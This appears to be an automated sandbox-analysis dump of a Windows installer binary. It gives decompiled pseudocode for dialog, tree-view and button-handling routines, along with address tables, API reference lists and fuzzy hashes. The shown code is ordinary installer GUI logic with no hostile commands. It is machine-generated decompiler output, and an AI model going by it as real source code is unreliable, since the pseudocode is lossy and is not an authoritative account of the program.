                                                                                                                          							if(_t327 != 0x20) {
                                                                                                                          								_v20 = 0;
                                                                                                                          							}
                                                                                                                          							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062E0(0, _t327, _t331, 0, _t272)), _t327);
                                                                                                                          						}
                                                                                                                          						_t327 = _t327 + 1;
                                                                                                                          					} while (_t327 < 0x21);
                                                                                                                          					_t328 = _a16;
                                                                                                                          					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                                                                                                          					_push(0x15);
                                                                                                                          					E004042D1(_a4);
                                                                                                                          					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                                                                                                          					_push(0x16);
                                                                                                                          					E004042D1(_a4);
                                                                                                                          					_t329 = 0;
                                                                                                                          					_v16 = 0;
                                                                                                                          					if( *0x42f48c <= 0) {
                                                                                                                          						L19:
                                                                                                                          						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                                          						goto L20;
                                                                                                                          					} else {
                                                                                                                          						_t316 = _v24 + 8;
                                                                                                                          						_v32 = _t316;
                                                                                                                          						do {
                                                                                                                          							_t284 =  &(_t316[0x10]);
                                                                                                                          							if( *_t284 != 0) {
                                                                                                                          								_v64 = _t284;
                                                                                                                          								_t285 =  *_t316;
                                                                                                                          								_v88 = _v16;
                                                                                                                          								_t308 = 0x20;
                                                                                                                          								_v84 = 0xffff0002;
                                                                                                                          								_v80 = 0xd;
                                                                                                                          								_v68 = _t308;
                                                                                                                          								_v44 = _t329;
                                                                                                                          								_v72 = _t285 & _t308;
                                                                                                                          								if((_t285 & 0x00000002) == 0) {
                                                                                                                          									if((_t285 & 0x00000004) == 0) {
                                                                                                                          										 *( *0x42a8b0 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                                                                          									} else {
                                                                                                                          										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									_v80 = 0x4d;
                                                                                                                          									_v48 = 1;
                                                                                                                          									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                                                                          									_v36 = 1;
                                                                                                                          									 *( *0x42a8b0 + _t329 * 4) = _t290;
                                                                                                                          									_v16 =  *( *0x42a8b0 + _t329 * 4);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_t329 = _t329 + 1;
                                                                                                                          							_t316 =  &(_v32[0x418]);
                                                                                                                          							_v32 = _t316;
                                                                                                                          						} while (_t329 <  *0x42f48c);
                                                                                                                          						if(_v36 != 0) {
                                                                                                                          							L20:
                                                                                                                          							if(_v20 != 0) {
                                                                                                                          								E00404306(_v8);
                                                                                                                          								goto L23;
                                                                                                                          							} else {
                                                                                                                          								ShowWindow(_v12, 5);
                                                                                                                          								E00404306(_v12);
                                                                                                                          								L93:
                                                                                                                          								return E00404338(_a8, _a12, _a16);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L19;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}


























































                                                                                                                          0x004051f3
                                                                                                                          0x004051f3
                                                                                                                          0x004051fa
                                                                                                                          0x00405206
                                                                                                                          0x0040520a
                                                                                                                          0x0040520c
                                                                                                                          0x0040520c
                                                                                                                          0x004051fc
                                                                                                                          0x004051fe
                                                                                                                          0x004051fe
                                                                                                                          0x0040522c
                                                                                                                          0x00405238
                                                                                                                          0x00405247
                                                                                                                          0x00405247
                                                                                                                          0x00405249
                                                                                                                          0x0040524c
                                                                                                                          0x00405255
                                                                                                                          0x00000000
                                                                                                                          0x0040515c
                                                                                                                          0x00405167
                                                                                                                          0x0040516a
                                                                                                                          0x0040516f
                                                                                                                          0x00405171
                                                                                                                          0x00405175
                                                                                                                          0x00405185
                                                                                                                          0x0040518f
                                                                                                                          0x00405191
                                                                                                                          0x00405194
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405177
                                                                                                                          0x00405177
                                                                                                                          0x0040517d
                                                                                                                          0x0040517f
                                                                                                                          0x0040517f
                                                                                                                          0x00405180
                                                                                                                          0x00405181
                                                                                                                          0x00000000
                                                                                                                          0x00405177
                                                                                                                          0x0040515a
                                                                                                                          0x00405135
                                                                                                                          0x00405078
                                                                                                                          0x00000000
                                                                                                                          0x0040508e
                                                                                                                          0x00405098
                                                                                                                          0x0040509d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004050af
                                                                                                                          0x004050b4
                                                                                                                          0x004050c0
                                                                                                                          0x004050c0
                                                                                                                          0x004050c2
                                                                                                                          0x004050d1
                                                                                                                          0x004050d3
                                                                                                                          0x004050d7
                                                                                                                          0x004050da
                                                                                                                          0x00000000
                                                                                                                          0x004050da
                                                                                                                          0x00405078
                                                                                                                          0x00404d2c
                                                                                                                          0x00404d2f
                                                                                                                          0x00404d32
                                                                                                                          0x00404d42
                                                                                                                          0x00404d55
                                                                                                                          0x00404d60
                                                                                                                          0x00404d66
                                                                                                                          0x00404d74
                                                                                                                          0x00404d87
                                                                                                                          0x00404d8c
                                                                                                                          0x00404d97
                                                                                                                          0x00404da0
                                                                                                                          0x00404db6
                                                                                                                          0x00404dc6
                                                                                                                          0x00404dd2
                                                                                                                          0x00404dd2
                                                                                                                          0x00404dd7
                                                                                                                          0x00404ddd
                                                                                                                          0x00404ddf
                                                                                                                          0x00404de2
                                                                                                                          0x00404de7
                                                                                                                          0x00404dec
                                                                                                                          0x00404dee
                                                                                                                          0x00404dee
                                                                                                                          0x00404e0e
                                                                                                                          0x00404e0e
                                                                                                                          0x00404e10
                                                                                                                          0x00404e11
                                                                                                                          0x00404e16
                                                                                                                          0x00404e1c
                                                                                                                          0x00404e20
                                                                                                                          0x00404e25
                                                                                                                          0x00404e2d
                                                                                                                          0x00404e31
                                                                                                                          0x00404e36
                                                                                                                          0x00404e3b
                                                                                                                          0x00404e43
                                                                                                                          0x00404e46
                                                                                                                          0x00404f15
                                                                                                                          0x00404f28
                                                                                                                          0x00000000
                                                                                                                          0x00404e4c
                                                                                                                          0x00404e4f
                                                                                                                          0x00404e52
                                                                                                                          0x00404e55
                                                                                                                          0x00404e55
                                                                                                                          0x00404e5a
                                                                                                                          0x00404e63
                                                                                                                          0x00404e66
                                                                                                                          0x00404e6a
                                                                                                                          0x00404e6d
                                                                                                                          0x00404e70
                                                                                                                          0x00404e79
                                                                                                                          0x00404e82
                                                                                                                          0x00404e85
                                                                                                                          0x00404e88
                                                                                                                          0x00404e8b
                                                                                                                          0x00404ec9
                                                                                                                          0x00404ef4
                                                                                                                          0x00404ecb
                                                                                                                          0x00404eda
                                                                                                                          0x00404eda
                                                                                                                          0x00404e8d
                                                                                                                          0x00404e90
                                                                                                                          0x00404e9e
                                                                                                                          0x00404ea8
                                                                                                                          0x00404eb0
                                                                                                                          0x00404eb7
                                                                                                                          0x00404ec2
                                                                                                                          0x00404ec2
                                                                                                                          0x00404e8b
                                                                                                                          0x00404efa
                                                                                                                          0x00404efb
                                                                                                                          0x00404f07
                                                                                                                          0x00404f07
                                                                                                                          0x00404f13
                                                                                                                          0x00404f2e
                                                                                                                          0x00404f31
                                                                                                                          0x00404f4e
                                                                                                                          0x00000000
                                                                                                                          0x00404f33
                                                                                                                          0x00404f38
                                                                                                                          0x00404f41
                                                                                                                          0x004052d3
                                                                                                                          0x004052e5
                                                                                                                          0x004052e5
                                                                                                                          0x00404f31
                                                                                                                          0x00000000
                                                                                                                          0x00404f13
                                                                                                                          0x00404e46

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 00404CED
                                                                                                                          • GetDlgItem.USER32 ref: 00404CFA
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D49
                                                                                                                          • LoadImageA.USER32 ref: 00404D60
                                                                                                                          • SetWindowLongA.USER32 ref: 00404D7A
                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8C
                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA0
                                                                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404DB6
                                                                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404DC2
                                                                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DD2
                                                                                                                          • DeleteObject.GDI32(00000110), ref: 00404DD7
                                                                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E02
                                                                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E0E
                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EA8
                                                                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404ED8
                                                                                                                            • Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314
                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EEC
                                                                                                                          • GetWindowLongA.USER32 ref: 00404F1A
                                                                                                                          • SetWindowLongA.USER32 ref: 00404F28
                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404F38
                                                                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00405033
                                                                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405098
                                                                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004050AD
                                                                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050D1
                                                                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050F1
                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405106
                                                                                                                          • GlobalFree.KERNEL32 ref: 00405116
                                                                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040518F
                                                                                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00405238
                                                                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405247
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405271
                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004052BF
                                                                                                                          • GetDlgItem.USER32 ref: 004052CA
                                                                                                                          • ShowWindow.USER32(00000000), ref: 004052D1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                          • String ID: $M$N
                                                                                                                          • API String ID: 2564846305-813528018
                                                                                                                          • Opcode ID: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                                                                          • Instruction ID: 815a2de4fdf1bcdeb3ef1062daa1c2d9177896ce2fe1d13919dbb69bdfef4a57
                                                                                                                          • Opcode Fuzzy Hash: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                                                                          • Instruction Fuzzy Hash: 21027BB0A00209AFDB20DF94DD45AAE7BB5FB44314F50817AF610BA2E0C7799E52CF58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E00403DFD(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                                                          				struct HWND__* _v32;
                                                                                                                          				void* _v84;
                                                                                                                          				void* _v88;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				signed int _t35;
                                                                                                                          				signed int _t37;
                                                                                                                          				signed int _t39;
                                                                                                                          				struct HWND__* _t49;
                                                                                                                          				signed int _t68;
                                                                                                                          				struct HWND__* _t74;
                                                                                                                          				signed int _t87;
                                                                                                                          				struct HWND__* _t92;
                                                                                                                          				signed int _t100;
                                                                                                                          				int _t104;
                                                                                                                          				signed int _t116;
                                                                                                                          				signed int _t117;
                                                                                                                          				int _t118;
                                                                                                                          				signed int _t123;
                                                                                                                          				struct HWND__* _t126;
                                                                                                                          				struct HWND__* _t127;
                                                                                                                          				int _t128;
                                                                                                                          				long _t131;
                                                                                                                          				int _t133;
                                                                                                                          				int _t134;
                                                                                                                          				void* _t135;
                                                                                                                          				void* _t143;
                                                                                                                          
                                                                                                                          				_t116 = _a8;
                                                                                                                          				if(_t116 == 0x110 || _t116 == 0x408) {
                                                                                                                          					_t35 = _a12;
                                                                                                                          					_t126 = _a4;
                                                                                                                          					__eflags = _t116 - 0x110;
                                                                                                                          					 *0x42a8a0 = _t35;
                                                                                                                          					if(_t116 == 0x110) {
                                                                                                                          						 *0x42f448 = _t126;
                                                                                                                          						 *0x42a8b4 = GetDlgItem(_t126, 1);
                                                                                                                          						_t92 = GetDlgItem(_t126, 2);
                                                                                                                          						_push(0xffffffff);
                                                                                                                          						_push(0x1c);
                                                                                                                          						 *0x429880 = _t92;
                                                                                                                          						E004042D1(_t126);
                                                                                                                          						SetClassLongA(_t126, 0xfffffff2,  *0x42ec28);
                                                                                                                          						 *0x42ec0c = E0040140B(4);
                                                                                                                          						_t35 = 1;
                                                                                                                          						__eflags = 1;
                                                                                                                          						 *0x42a8a0 = 1;
                                                                                                                          					}
                                                                                                                          					_t123 =  *0x40a1f8; // 0xffffffff
                                                                                                                          					_t134 = 0;
                                                                                                                          					_t131 = (_t123 << 6) +  *0x42f480;
                                                                                                                          					__eflags = _t123;
                                                                                                                          					if(_t123 < 0) {
                                                                                                                          						L34:
                                                                                                                          						E0040431D(0x40b);
                                                                                                                          						while(1) {
                                                                                                                          							_t37 =  *0x42a8a0;
                                                                                                                          							 *0x40a1f8 =  *0x40a1f8 + _t37;
                                                                                                                          							_t131 = _t131 + (_t37 << 6);
                                                                                                                          							_t39 =  *0x40a1f8; // 0xffffffff
                                                                                                                          							__eflags = _t39 -  *0x42f484;
                                                                                                                          							if(_t39 ==  *0x42f484) {
                                                                                                                          								E0040140B(1);
                                                                                                                          							}
                                                                                                                          							__eflags =  *0x42ec0c - _t134; // 0x0
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							__eflags =  *0x40a1f8 -  *0x42f484; // 0xffffffff
                                                                                                                          							if(__eflags >= 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							_t117 =  *(_t131 + 0x14);
                                                                                                                          							E004062E0(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
                                                                                                                          							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                                                                                          							_push(0xfffffc19);
                                                                                                                          							E004042D1(_t126);
                                                                                                                          							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                                                                                          							_push(0xfffffc1b);
                                                                                                                          							E004042D1(_t126);
                                                                                                                          							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                                                                                          							_push(0xfffffc1a);
                                                                                                                          							E004042D1(_t126);
                                                                                                                          							_t49 = GetDlgItem(_t126, 3);
                                                                                                                          							__eflags =  *0x42f4ec - _t134;
                                                                                                                          							_v32 = _t49;
                                                                                                                          							if( *0x42f4ec != _t134) {
                                                                                                                          								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                                                          								__eflags = _t117;
                                                                                                                          							}
                                                                                                                          							ShowWindow(_t49, _t117 & 0x00000008);
                                                                                                                          							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
                                                                                                                          							E004042F3(_t117 & 0x00000002);
                                                                                                                          							_t118 = _t117 & 0x00000004;
                                                                                                                          							EnableWindow( *0x429880, _t118);
                                                                                                                          							__eflags = _t118 - _t134;
                                                                                                                          							if(_t118 == _t134) {
                                                                                                                          								_push(1);
                                                                                                                          							} else {
                                                                                                                          								_push(_t134);
                                                                                                                          							}
                                                                                                                          							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                                                                                                                          							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                                                                                                                          							__eflags =  *0x42f4ec - _t134;
                                                                                                                          							if( *0x42f4ec == _t134) {
                                                                                                                          								_push( *0x42a8b4);
                                                                                                                          							} else {
                                                                                                                          								SendMessageA(_t126, 0x401, 2, _t134);
                                                                                                                          								_push( *0x429880);
                                                                                                                          							}
                                                                                                                          							E00404306();
                                                                                                                          							E0040624D(0x42a8b8, E00403DDE());
                                                                                                                          							E004062E0(0x42a8b8, _t126, _t131,  &(0x42a8b8[lstrlenA(0x42a8b8)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                                                                                          							SetWindowTextA(_t126, 0x42a8b8);
                                                                                                                          							_push(_t134);
                                                                                                                          							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                                                                                                          							__eflags = _t68;
                                                                                                                          							if(_t68 != 0) {
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								__eflags =  *_t131 - _t134;
                                                                                                                          								if( *_t131 == _t134) {
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          								__eflags =  *(_t131 + 4) - 5;
                                                                                                                          								if( *(_t131 + 4) != 5) {
                                                                                                                          									DestroyWindow( *0x42ec18);
                                                                                                                          									 *0x42a090 = _t131;
                                                                                                                          									__eflags =  *_t131 - _t134;
                                                                                                                          									if( *_t131 <= _t134) {
                                                                                                                          										goto L58;
                                                                                                                          									}
                                                                                                                          									_t74 = CreateDialogParamA( *0x42f440,  *_t131 +  *0x42ec20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
                                                                                                                          									__eflags = _t74 - _t134;
                                                                                                                          									 *0x42ec18 = _t74;
                                                                                                                          									if(_t74 == _t134) {
                                                                                                                          										goto L58;
                                                                                                                          									}
                                                                                                                          									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                                                                                          									_push(6);
                                                                                                                          									E004042D1(_t74);
                                                                                                                          									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                                                                                                                          									ScreenToClient(_t126, _t135 + 0x10);
                                                                                                                          									SetWindowPos( *0x42ec18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                                                                                          									_push(_t134);
                                                                                                                          									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                                                                                                          									__eflags =  *0x42ec0c - _t134; // 0x0
                                                                                                                          									if(__eflags != 0) {
                                                                                                                          										goto L61;
                                                                                                                          									}
                                                                                                                          									ShowWindow( *0x42ec18, 8);
                                                                                                                          									E0040431D(0x405);
                                                                                                                          									goto L58;
                                                                                                                          								}
                                                                                                                          								__eflags =  *0x42f4ec - _t134;
                                                                                                                          								if( *0x42f4ec != _t134) {
                                                                                                                          									goto L61;
                                                                                                                          								}
                                                                                                                          								__eflags =  *0x42f4e0 - _t134;
                                                                                                                          								if( *0x42f4e0 != _t134) {
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          								goto L61;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						DestroyWindow( *0x42ec18);
                                                                                                                          						 *0x42f448 = _t134;
                                                                                                                          						EndDialog(_t126,  *0x429c88);
                                                                                                                          						goto L58;
                                                                                                                          					} else {
                                                                                                                          						__eflags = _t35 - 1;
                                                                                                                          						if(_t35 != 1) {
                                                                                                                          							L33:
                                                                                                                          							__eflags =  *_t131 - _t134;
                                                                                                                          							if( *_t131 == _t134) {
                                                                                                                          								goto L61;
                                                                                                                          							}
                                                                                                                          							goto L34;
                                                                                                                          						}
                                                                                                                          						_push(0);
                                                                                                                          						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                                                                                                          						__eflags = _t87;
                                                                                                                          						if(_t87 == 0) {
                                                                                                                          							goto L33;
                                                                                                                          						}
                                                                                                                          						SendMessageA( *0x42ec18, 0x40f, 0, 1);
                                                                                                                          						__eflags =  *0x42ec0c - _t134; // 0x0
                                                                                                                          						return 0 | __eflags == 0x00000000;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t126 = _a4;
                                                                                                                          					_t134 = 0;
                                                                                                                          					if(_t116 == 0x47) {
                                                                                                                          						SetWindowPos( *0x42a898, _t126, 0, 0, 0, 0, 0x13);
                                                                                                                          					}
                                                                                                                          					if(_t116 == 5) {
                                                                                                                          						asm("sbb eax, eax");
                                                                                                                          						ShowWindow( *0x42a898,  ~(_a12 - 1) & _t116);
                                                                                                                          					}
                                                                                                                          					if(_t116 != 0x40d) {
                                                                                                                          						__eflags = _t116 - 0x11;
                                                                                                                          						if(_t116 != 0x11) {
                                                                                                                          							__eflags = _t116 - 0x111;
                                                                                                                          							if(_t116 != 0x111) {
                                                                                                                          								L26:
                                                                                                                          								return E00404338(_t116, _a12, _a16);
                                                                                                                          							}
                                                                                                                          							_t133 = _a12 & 0x0000ffff;
                                                                                                                          							_t127 = GetDlgItem(_t126, _t133);
                                                                                                                          							__eflags = _t127 - _t134;
                                                                                                                          							if(_t127 == _t134) {
                                                                                                                          								L13:
                                                                                                                          								__eflags = _t133 - 1;
                                                                                                                          								if(_t133 != 1) {
                                                                                                                          									__eflags = _t133 - 3;
                                                                                                                          									if(_t133 != 3) {
                                                                                                                          										_t128 = 2;
                                                                                                                          										__eflags = _t133 - _t128;
                                                                                                                          										if(_t133 != _t128) {
                                                                                                                          											L25:
                                                                                                                          											SendMessageA( *0x42ec18, 0x111, _a12, _a16);
                                                                                                                          											goto L26;
                                                                                                                          										}
                                                                                                                          										__eflags =  *0x42f4ec - _t134;
                                                                                                                          										if( *0x42f4ec == _t134) {
                                                                                                                          											_t100 = E0040140B(3);
                                                                                                                          											__eflags = _t100;
                                                                                                                          											if(_t100 != 0) {
                                                                                                                          												goto L26;
                                                                                                                          											}
                                                                                                                          											 *0x429c88 = 1;
                                                                                                                          											L21:
                                                                                                                          											_push(0x78);
                                                                                                                          											L22:
                                                                                                                          											E004042AA();
                                                                                                                          											goto L26;
                                                                                                                          										}
                                                                                                                          										E0040140B(_t128);
                                                                                                                          										 *0x429c88 = _t128;
                                                                                                                          										goto L21;
                                                                                                                          									}
                                                                                                                          									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
                                                                                                                          									if(__eflags <= 0) {
                                                                                                                          										goto L25;
                                                                                                                          									}
                                                                                                                          									_push(0xffffffff);
                                                                                                                          									goto L22;
                                                                                                                          								}
                                                                                                                          								_push(_t133);
                                                                                                                          								goto L22;
                                                                                                                          							}
                                                                                                                          							SendMessageA(_t127, 0xf3, _t134, _t134);
                                                                                                                          							_t104 = IsWindowEnabled(_t127);
                                                                                                                          							__eflags = _t104;
                                                                                                                          							if(_t104 == 0) {
                                                                                                                          								goto L61;
                                                                                                                          							}
                                                                                                                          							goto L13;
                                                                                                                          						}
                                                                                                                          						SetWindowLongA(_t126, _t134, _t134);
                                                                                                                          						return 1;
                                                                                                                          					} else {
                                                                                                                          						DestroyWindow( *0x42ec18);
                                                                                                                          						 *0x42ec18 = _a12;
                                                                                                                          						L58:
                                                                                                                          						if( *0x42b8b8 == _t134) {
                                                                                                                          							_t143 =  *0x42ec18 - _t134; // 0x0
                                                                                                                          							if(_t143 != 0) {
                                                                                                                          								ShowWindow(_t126, 0xa);
                                                                                                                          								 *0x42b8b8 = 1;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L61:
                                                                                                                          						return 0;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}































                                                                                                                          0x00403ed0
                                                                                                                          0x00403ed0
                                                                                                                          0x00403ed3
                                                                                                                          0x00403ed8
                                                                                                                          0x00403edb
                                                                                                                          0x00403eeb
                                                                                                                          0x00403eec
                                                                                                                          0x00403eee
                                                                                                                          0x00403f24
                                                                                                                          0x00403f37
                                                                                                                          0x00000000
                                                                                                                          0x00403f37
                                                                                                                          0x00403ef0
                                                                                                                          0x00403ef6
                                                                                                                          0x00403f0f
                                                                                                                          0x00403f14
                                                                                                                          0x00403f16
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403f18
                                                                                                                          0x00403f04
                                                                                                                          0x00403f04
                                                                                                                          0x00403f06
                                                                                                                          0x00403f06
                                                                                                                          0x00000000
                                                                                                                          0x00403f06
                                                                                                                          0x00403ef9
                                                                                                                          0x00403efe
                                                                                                                          0x00000000
                                                                                                                          0x00403efe
                                                                                                                          0x00403edd
                                                                                                                          0x00403ee3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403ee5
                                                                                                                          0x00000000
                                                                                                                          0x00403ee5
                                                                                                                          0x00403ed5
                                                                                                                          0x00000000
                                                                                                                          0x00403ed5
                                                                                                                          0x00403ebb
                                                                                                                          0x00403ec2
                                                                                                                          0x00403ec8
                                                                                                                          0x00403eca
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403eca
                                                                                                                          0x00403e86
                                                                                                                          0x00000000
                                                                                                                          0x00403e64
                                                                                                                          0x00403e6a
                                                                                                                          0x00403e74
                                                                                                                          0x0040427b
                                                                                                                          0x00404281
                                                                                                                          0x00404283
                                                                                                                          0x00404289
                                                                                                                          0x0040428e
                                                                                                                          0x00404294
                                                                                                                          0x00404294
                                                                                                                          0x00404289
                                                                                                                          0x0040429e
                                                                                                                          0x00000000
                                                                                                                          0x0040429e
                                                                                                                          0x00403e62

                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
                                                                                                                          • ShowWindow.USER32(?), ref: 00403E56
                                                                                                                          • DestroyWindow.USER32 ref: 00403E6A
                                                                                                                          • SetWindowLongA.USER32 ref: 00403E86
                                                                                                                          • GetDlgItem.USER32 ref: 00403EA7
                                                                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBB
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403EC2
                                                                                                                          • GetDlgItem.USER32 ref: 00403F70
                                                                                                                          • GetDlgItem.USER32 ref: 00403F7A
                                                                                                                          • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403F94
                                                                                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FE5
                                                                                                                          • GetDlgItem.USER32 ref: 0040408B
                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 004040AC
                                                                                                                          • EnableWindow.USER32(?,?), ref: 004040BE
                                                                                                                          • EnableWindow.USER32(?,?), ref: 004040D9
                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040EF
                                                                                                                          • EnableMenuItem.USER32 ref: 004040F6
                                                                                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040410E
                                                                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404121
                                                                                                                          • lstrlenA.KERNEL32(0042A8B8,?,0042A8B8,00000000), ref: 0040414B
                                                                                                                          • SetWindowTextA.USER32(?,0042A8B8), ref: 0040415A
                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 0040428E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 184305955-0
                                                                                                                          • Opcode ID: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                                                                          • Instruction ID: d5b7a152eccfdaa35e4c53a1a76e60acfbe2d5449824965e5503988bb7e30882
                                                                                                                          • Opcode Fuzzy Hash: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                                                                          • Instruction Fuzzy Hash: 34C1E671604204ABDB216F62EE85E2B3BB8FB85349F40053EF641B51F0CB795892DB2D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E0040443C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                                                          				char _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				struct HWND__* _t52;
                                                                                                                          				long _t86;
                                                                                                                          				int _t98;
                                                                                                                          				struct HWND__* _t99;
                                                                                                                          				signed int _t100;
